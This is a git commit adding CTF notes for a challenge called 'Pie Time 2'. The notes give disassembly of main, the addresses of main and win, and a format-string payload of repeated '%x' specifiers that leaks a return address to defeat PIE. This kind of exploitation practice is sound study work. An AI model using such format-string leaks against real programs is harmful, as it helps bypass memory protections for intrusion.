Pie Time 2

2025-12-04 11:53:31 +01:00
parent 18d2c8c2be
commit a3a7081d42
5 changed files with 232 additions and 0 deletions
--- a/pie_time_2/notes.md
+++ b/pie_time_2/notes.md
@@ -0,0 +1,30 @@
+# find main layout with `objdump -d --disassemble=main vuln`
+```assembly
+0000000000001400 <main>:
+    1400:	f3 0f 1e fa          	endbr64
+    1404:	55                   	push   %rbp
+    1405:	48 89 e5             	mov    %rsp,%rbp
+    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9 <segfault_handler>
+    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
+    1414:	e8 57 fd ff ff       	call   1170 <signal@plt>
+    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010 <stdout@GLIBC_2.2.5>
+    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
+    1425:	ba 02 00 00 00       	mov    $0x2,%edx
+    142a:	be 00 00 00 00       	mov    $0x0,%esi
+    142f:	48 89 c7             	mov    %rax,%rdi
+    1432:	e8 49 fd ff ff       	call   1180 <setvbuf@plt>
+    1437:	b8 00 00 00 00       	mov    $0x0,%eax
+    143c:	e8 86 fe ff ff       	call   12c7 <call_functions>
+    1441:	b8 00 00 00 00       	mov    $0x0,%eax
+    1446:	5d                   	pop    %rbp
+    1447:	c3                   	ret
+```
+# find `main` and `win` locations
+```
+000000000000136a g     F .text	0000000000000096              win
+0000000000001400 g     F .text	0000000000000048              main
+```
+# find buffer offset to read return address into `main` via gdb
+- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
+- return value $\leftrightarrow$ *main+65 after dot
+